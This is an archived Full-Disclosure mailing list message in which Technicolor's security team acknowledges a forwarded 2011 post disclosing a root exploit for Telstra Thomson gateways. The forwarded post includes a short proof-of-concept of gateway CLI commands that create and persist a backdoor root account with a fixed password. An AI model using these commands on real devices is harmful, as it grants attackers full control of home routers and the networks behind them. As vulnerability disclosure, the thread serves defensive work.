[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Telstra thompson gateway - root exploit (0day)



Dear Mr secn3t,

Thank you for porting this security issue to our attention.
We will analyze your report about the aforementioned issue.

For your information, Technicolor products security issues may be reported to 
the following address: security_at_technicolor.com.
So for you future potential findings, do not hesitate to directly contact us.

Technicolor is making its best to avoid security issues in its products, but we 
never be 100% sure we missed no one.

Best regards, Technicolor Security Team.

-- 
Patrice Auffret | Security Assessment Coordinator
Security and Content Protection Labs | Technology & Engineering
+33 (0)2 99 27 3246 | +33 (0)6 81 98 8007

----- Forwarded message from xD 0x41 <secn3t@xxxxxxxxx> -----

Date: Fri, 29 Jul 2011 06:59:34 +1000
From: xD 0x41 <secn3t@xxxxxxxxx>
To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Telstra thompson gateway - root exploit (0day)

Telstra thompson gateway - root exploit

Telstra is an ISP here in Australia, it is also the same isp wich owns the
NBN

Author: Talon ( #haxnet member)


PoC script:

script add name addroot command user add name talon password talon role root
descr ROOT
script run name addroot pars
saveall


This would add a root user as talon:talon ,with complete control over the
gateway and anything running from it.
On behalf of talon, before it gets raped by some idling non @.
cheers

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


----- End forwarded message -----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/